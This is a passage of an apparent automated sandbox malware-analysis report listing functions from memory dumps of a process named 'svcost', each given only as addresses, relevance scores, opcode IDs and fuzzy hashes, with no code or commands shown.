                                                                                            • Instruction Fuzzy Hash: 44012878A05218CFDB50EF64D89579EB7B1EB9A310F0080EAA81AB7394CB744E84CF51
                                                                                            Function 023A6EAD Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: ca3af89c1465e89f91f4bfb044d66f9f60e6475fa51b7c2f2198f15504ac6186
                                                                                            • Instruction ID: cce1273983e793dd1a9e018152712b6e0821ffc5938142c718030bd4c7deee70
                                                                                            • Opcode Fuzzy Hash: ca3af89c1465e89f91f4bfb044d66f9f60e6475fa51b7c2f2198f15504ac6186
                                                                                            • Instruction Fuzzy Hash: 3601DDB4A112289FCB10DFA8D985B9EBBB1FB89314F0401AAE409B7385CB759D84CF00
                                                                                            Function 0069C564 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 17152a3274789d64a45498097bbc5ae653bfb97119b322ebe517cdb1d6cd2af4
                                                                                            • Instruction ID: b3fc38c1df1658041b2a9fa98183b8fab573be9f9f26f491d5247c921c0d50c6
                                                                                            • Opcode Fuzzy Hash: 17152a3274789d64a45498097bbc5ae653bfb97119b322ebe517cdb1d6cd2af4
                                                                                            • Instruction Fuzzy Hash: A301F6749042198FCBA0CF14DD84BEAB7F9AB09310F1040A6E01CAB684DB319AC8CF40
                                                                                            Function 00699A87 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: d78f4085a6b286e2732393c0bb29b9374a6d52588f05d05a7b69322ead262990
                                                                                            • Instruction ID: dc56fddb4fc98cfd87b62ea9a76e7389b8739cfe8a8405ac082c8047ca1d5067
                                                                                            • Opcode Fuzzy Hash: d78f4085a6b286e2732393c0bb29b9374a6d52588f05d05a7b69322ead262990
                                                                                            • Instruction Fuzzy Hash: 32F0E274D042088FDB60EFA8C4447AEBBF6AF8A300F24402ED015B7395DB385989CF61
                                                                                            Function 023A679E Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 95efadc283a40233cc3224ccc4817072460bd0c51df01437c1e8e78049e77e5c
                                                                                            • Instruction ID: 2021cb60034aa0115b4e3a5bb6660047d1574c697e37a689db77057b97ca6bfa
                                                                                            • Opcode Fuzzy Hash: 95efadc283a40233cc3224ccc4817072460bd0c51df01437c1e8e78049e77e5c
                                                                                            • Instruction Fuzzy Hash: AAF044B4A04218DFCB54DF24E88A79DBBB5FB5A310F4040A9E009A7795CB345D89CF00
                                                                                            Function 023A6CBF Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: b101755a68191c43ef5ae4093768f166cadf8648a2ab229ad224697d7882ae4c
                                                                                            • Instruction ID: 810b4d745d270c6165d3c35f0d4410320b9ae7611b68b95ef99e84d06bbcd833
                                                                                            • Opcode Fuzzy Hash: b101755a68191c43ef5ae4093768f166cadf8648a2ab229ad224697d7882ae4c
                                                                                            • Instruction Fuzzy Hash: 04F04934A04158DFCB28DF54D9957ADB7B1EB59310F1010B9E509A7794CB345D84CF04
                                                                                            Function 023A66DC Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 6ce12160bc4f2f2047dd49ad474d1b6f2582713a9280e1adc2cdf2863f24a313
                                                                                            • Instruction ID: 862e38a3e9d7066614bdd8d490af52824b11edfa7d06b30447ea3b2e3f3de955
                                                                                            • Opcode Fuzzy Hash: 6ce12160bc4f2f2047dd49ad474d1b6f2582713a9280e1adc2cdf2863f24a313
                                                                                            • Instruction Fuzzy Hash: DFF01274E04218DFDB14EF68E896B9DBBB5FB49320F0454A9E419A3295CB749D85CF00
                                                                                            Function 0069CF9E Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 3d4df355f5a38b3e465e524055d960f21b767b295a798ca3796be2881407fd8b
                                                                                            • Instruction ID: 571965615fc80ba0bb360613e1f772c6228a9834d815c9ca0b427ae21fbb365e
                                                                                            • Opcode Fuzzy Hash: 3d4df355f5a38b3e465e524055d960f21b767b295a798ca3796be2881407fd8b
                                                                                            • Instruction Fuzzy Hash: 45F0F870905218CFDB60DF18C9847DDB7F6EB48321F108095A459A77A2CB748EC5DF04
                                                                                            Function 0211C5D8 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 2989dd73bf366d1dc6b9a3d629f27d1c1c41330ea460e695b5a458728c65caf5
                                                                                            • Instruction ID: e7e96d4e9542baaf4cf971f82af0d911f12c1162180936f45fffe3868ad48ff5
                                                                                            • Opcode Fuzzy Hash: 2989dd73bf366d1dc6b9a3d629f27d1c1c41330ea460e695b5a458728c65caf5
                                                                                            • Instruction Fuzzy Hash: 67E04F309892089BDB04EBB8961579DBBB8DB45305F5050BA9808A3390DB305A54CB86
                                                                                            Function 00695C69 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 5048487d933e2a1cec6ced1c8b7489645864fa387d48765dca3466e95bbf552c
                                                                                            • Instruction ID: 0848356ee27bb6079f072fd142a32539e8645fb18ab719d924ae51e3da18782f
                                                                                            • Opcode Fuzzy Hash: 5048487d933e2a1cec6ced1c8b7489645864fa387d48765dca3466e95bbf552c
                                                                                            • Instruction Fuzzy Hash: 53F0C974918119CBCF259F24D854BEAB6B6FB56304F5010E6D01662A91C7744E85DF18
                                                                                            Function 023A6C55 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 29d6cd55c91ef99931b22576e00e8db174e951be2c42de4fc02e1921a5c17e2b
                                                                                            • Instruction ID: 8f519a69c2837b8be502b11739c2572276e0d6b2960268c7e6b8c6ec7e6ee7da
                                                                                            • Opcode Fuzzy Hash: 29d6cd55c91ef99931b22576e00e8db174e951be2c42de4fc02e1921a5c17e2b
                                                                                            • Instruction Fuzzy Hash: 7BF09874A06219CBEB54EF14D894B99B7B1FB59300F1052AAE80DA7399DB345D848F14
                                                                                            Function 023A64B8 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 5798e294a41fb95da23e1c3ddbb65f807cbb4deca839618f4cdc6b9f4697195b
                                                                                            • Instruction ID: efd4e3be5faeb69a8d3d274c564d5d175a60e386a879dc4010b77a7b9007baec
                                                                                            • Opcode Fuzzy Hash: 5798e294a41fb95da23e1c3ddbb65f807cbb4deca839618f4cdc6b9f4697195b
                                                                                            • Instruction Fuzzy Hash: 20F03270A04218DFCF00EF54E99679EBBB2FB59301F5050AAE10AA7794CB345E808F0A
                                                                                            Function 023A35B6 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: j
                                                                                            • API String ID: 0-2137352139
                                                                                            • Opcode ID: b962845fe10c82b27308d7096b229490e46ca77286d767b8dac6e06620e04248
                                                                                            • Instruction ID: 7e0da9516aebdb0739878d8f784159b2f8ec34544315642bdc7b74ce5a37faa3
                                                                                            • Opcode Fuzzy Hash: b962845fe10c82b27308d7096b229490e46ca77286d767b8dac6e06620e04248
                                                                                            • Instruction Fuzzy Hash: 61E092B5A18358CFDB14DF54D855BAD7BE5AB25301F0001A4C0086B255D7719A85CE42
                                                                                            Function 02112F28 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C
                                                                                            • API String ID: 0-2515487769
                                                                                            • Opcode ID: 6cfce2d69e68bb1e65167e986ac48511d0f41c6ed61658dac6c193d195b645f5
                                                                                            • Instruction ID: 4f809c2c9199f3c7a3876e35d333167fa3738df88d6cd4a66105cd0b3ebc0389
                                                                                            • Opcode Fuzzy Hash: 6cfce2d69e68bb1e65167e986ac48511d0f41c6ed61658dac6c193d195b645f5
                                                                                            • Instruction Fuzzy Hash: 3AE0127194620CDBD700EFB59910A9E77A8DB06209F1041B6D50593261DF315A149BD6
                                                                                            Function 002FCA88 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,zJ
                                                                                            • API String ID: 0-2379177828
                                                                                            • Opcode ID: b81f60f0bdf2a3594ab35c615bb6be247d97696cdfe785e595ff1188bc81bf0e
                                                                                            • Instruction ID: 7b87141464a72abc30d42a5a9ad4e2aa26a9af0e31cb875a8ea93a6df1ba1e1e
                                                                                            • Opcode Fuzzy Hash: b81f60f0bdf2a3594ab35c615bb6be247d97696cdfe785e595ff1188bc81bf0e
                                                                                            • Instruction Fuzzy Hash: BBE08C7190120CABC704EFB09E24A9E7BB8EB06205F1040B6C20493120DF315A048B96
                                                                                            Function 023A695A Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: ecc20ad0e48efdd94dfe5f1742f97c59f2f8d6efeeb9b28e46d581bfdb18c676
                                                                                            • Instruction ID: 18b055e2274434992532f60c1c0aa5b4fda3fb8be7caf46df643a879f5beb3da
                                                                                            • Opcode Fuzzy Hash: ecc20ad0e48efdd94dfe5f1742f97c59f2f8d6efeeb9b28e46d581bfdb18c676
                                                                                            • Instruction Fuzzy Hash: F8E03930A0510ACFDB20DF24D999BD977B5EB48311F2040A5901AA7655EB344D81DF14
                                                                                            Function 02117B0A Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: \
                                                                                            • API String ID: 0-2967466578
                                                                                            • Opcode ID: ee6c9539b8ccfc6d66e0b30ed5a38e955028b6271435fa0bef37e3341bb7094b
                                                                                            • Instruction ID: c186a33f63225c64e07bfa6489f15193be9e1d6793f9700eafb4427c750903fa
                                                                                            • Opcode Fuzzy Hash: ee6c9539b8ccfc6d66e0b30ed5a38e955028b6271435fa0bef37e3341bb7094b
                                                                                            • Instruction Fuzzy Hash: 92E09AB495515DCFDF29DF50D848BEDBBB4AB04315F15A0EAC41973290C3700A84DF19
                                                                                            Function 023A6BFF Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 04492ded218b4de9f805007b9949b54d39807a89b30c39d1d8e3e9f2e3de90c9
                                                                                            • Instruction ID: d881a8f8a59e40e75e417cf216756ae7920ad44a336c15a4bdeada7132ca4dbe
                                                                                            • Opcode Fuzzy Hash: 04492ded218b4de9f805007b9949b54d39807a89b30c39d1d8e3e9f2e3de90c9
                                                                                            • Instruction Fuzzy Hash: 61E01A34A002149BCB94EF14D89579D77BAEB89311F1090A9E00EA72B4CB301D88CF09
                                                                                            Function 023A683D Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 710f3c6c44a3593a9cee3c3bf36da50b1761f65ce0356576af4e1284ddc04861
                                                                                            • Instruction ID: c061299d3ba89b153cc3b113863fa6b06c17e1c89daf155e42bbe0fa471c21ba
                                                                                            • Opcode Fuzzy Hash: 710f3c6c44a3593a9cee3c3bf36da50b1761f65ce0356576af4e1284ddc04861
                                                                                            • Instruction Fuzzy Hash: F8E01A74A042189FCB14EF20D89579DB771FB8A300F4040A9E549B7394CB305E81CF45
                                                                                            Function 023A6F33 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: c7ac9cbd908453c6af350b5fdee38f55ad40fdaa9783a7587a703cb62cbf038c
                                                                                            • Instruction ID: b04c04ffe3b991a79aeabc3b468bba81c7c107cb46c655edab4b6e6f9bf6c8ea
                                                                                            • Opcode Fuzzy Hash: c7ac9cbd908453c6af350b5fdee38f55ad40fdaa9783a7587a703cb62cbf038c
                                                                                            • Instruction Fuzzy Hash: 10E04F34A05318CBCB14EF60DE5579E77B2EB96710F0000A8E509773A6CB301E80CF05
                                                                                            Function 023A6F89 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: b99ffc154b6d92e62a09c9b74d4ea4c7763130475348ce232a6a89c75d573c43
                                                                                            • Instruction ID: b21de341aa2c599517c3e05daf4f84d6eb4b798328024371c1077f0b8b7811cc
                                                                                            • Opcode Fuzzy Hash: b99ffc154b6d92e62a09c9b74d4ea4c7763130475348ce232a6a89c75d573c43
                                                                                            • Instruction Fuzzy Hash: EDE01A34A011148FDB14EF10DDA5B9DB7B5FB59301F0041EAA509B7394CB341E84CF15
                                                                                            Function 023A6D34 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 4ecee827f1418caffd09768c95a26c4c47920220c098289cf745ec155f000b47
                                                                                            • Instruction ID: bcb2340ef4092ddfa3749767caaeef5557e5182199d69d95b0fe9015ceb5b4c0
                                                                                            • Opcode Fuzzy Hash: 4ecee827f1418caffd09768c95a26c4c47920220c098289cf745ec155f000b47
                                                                                            • Instruction Fuzzy Hash: 45E01A34A00155CFDB54EF50D855B9EB7B1EB5A301F1080EAA50AB72E4CB701D84CF29
                                                                                            Function 023A6D8A Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 4abd67cd81270b533d2f01cee0ce58c33395beb54984e7aea070a793fb937169
                                                                                            • Instruction ID: b505a7dd17ec6f64dda1464f2649215045647f523d61ba30d735b6ac950f11a2
                                                                                            • Opcode Fuzzy Hash: 4abd67cd81270b533d2f01cee0ce58c33395beb54984e7aea070a793fb937169
                                                                                            • Instruction Fuzzy Hash: D3E01A30A00219CFDB64EF64D8957ED7771EB89301F1080F9A41A67BA4DB701D899F08
                                                                                            Function 0069997B Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: a8e1af0266df8ba2c31d33fbfd860fd4c87c4aeed4e4c828479aff3605aac897
                                                                                            • Instruction ID: 109c0c41dbc36613a77606510ac7825ae48791a7eb18d199b3dc97284aca5722
                                                                                            • Opcode Fuzzy Hash: a8e1af0266df8ba2c31d33fbfd860fd4c87c4aeed4e4c828479aff3605aac897
                                                                                            • Instruction Fuzzy Hash: CBE01738500108DBCF029FC4C8009CE7B77FB49311F108014E5057B2A9C7358944DB64
                                                                                            Function 023A6814 Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: e10958c3145c42762dc456ec1405952e792efc71ee5160c1e10ba3192d7365e8
                                                                                            • Instruction ID: c22a567fde75224e1afe35e8148cd068f74036645f02343dfff0589d1ac3328b
                                                                                            • Opcode Fuzzy Hash: e10958c3145c42762dc456ec1405952e792efc71ee5160c1e10ba3192d7365e8
                                                                                            • Instruction Fuzzy Hash: 55C08C3421C004CBD7007F40D8182A9322AE789308F001024D00236AD9CB780804DF14
                                                                                            Function 023AE600 Relevance: .5, Instructions: 516COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eda4d44ff5fa1ea1f121a243ba70369b042260179849be0288a0b28694fa53e0
                                                                                            • Instruction ID: ac73e38c0378fa6db08883c554868e3d163eb25757786932728b8d8dea21fc77
                                                                                            • Opcode Fuzzy Hash: eda4d44ff5fa1ea1f121a243ba70369b042260179849be0288a0b28694fa53e0
                                                                                            • Instruction Fuzzy Hash: 96226C30A00219DFCB15DFA4C864AAEBBF2FF48704F148535E811AB3A5DB799946CF90
                                                                                            Function 0211EAB8 Relevance: .4, Instructions: 370COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ed505f7619ca0a6ffe8f809e60f5d65dcba67dfeb44df5e58347e318ff2dfec0
                                                                                            • Instruction ID: 48f0c6d07060b23522cd8b6febf2ee95cd01cf7758bc4ed127944c6083a6b1ab
                                                                                            • Opcode Fuzzy Hash: ed505f7619ca0a6ffe8f809e60f5d65dcba67dfeb44df5e58347e318ff2dfec0
                                                                                            • Instruction Fuzzy Hash: D0F1C834A51118DFDB08DFA4D998A9DB7B2FF89300F118169E806AB3A5DF70EC42CB51
                                                                                            Function 0211EAA9 Relevance: .2, Instructions: 242COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cc3e5b608a2fbba8ed7388bede7ba403f3ddc0ac7db4c4ca0f602ef06e94d3ec
                                                                                            • Instruction ID: 5e4e9af182a0af17cb2751f135115fd43cd5e171bacd763f61b036e9ed33ad2b
                                                                                            • Opcode Fuzzy Hash: cc3e5b608a2fbba8ed7388bede7ba403f3ddc0ac7db4c4ca0f602ef06e94d3ec
                                                                                            • Instruction Fuzzy Hash: FBB11034A50218DFDB08DFA4D894A9DBBB2FF89300F158569E8066B3A5DF70AC46CF51
                                                                                            Function 023AADA8 Relevance: .2, Instructions: 216COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 313479198a9d53d4ca9e80259b51f27409747b1a124331d69f8d33a9b85351d2
                                                                                            • Instruction ID: 96aa2399650eb19491dde3423913fb70f3a9bc6904e88cd87705cea83aa75019
                                                                                            • Opcode Fuzzy Hash: 313479198a9d53d4ca9e80259b51f27409747b1a124331d69f8d33a9b85351d2
                                                                                            • Instruction Fuzzy Hash: 27816A36B01204CFDB19CF64E968AADBBF2FF88315F148169E811AB391DB399D41CB54
                                                                                            Function 002FECA8 Relevance: .2, Instructions: 208COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf9b74fa08aebe1cba4d5ac257db227852bd6ecda31b50eeb61bac5fa005f167
                                                                                            • Instruction ID: 68df71a05c7838939bf75106d899a9ae2fe522ba37d1d33e1aa90b2c83f8dfda
                                                                                            • Opcode Fuzzy Hash: bf9b74fa08aebe1cba4d5ac257db227852bd6ecda31b50eeb61bac5fa005f167
                                                                                            • Instruction Fuzzy Hash: 8B813635A10618CFDB15DFA8C484AADB7F5AF88751B1681A9E906DB370DB30EC41CB90
                                                                                            Function 0211C8F1 Relevance: .2, Instructions: 203COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
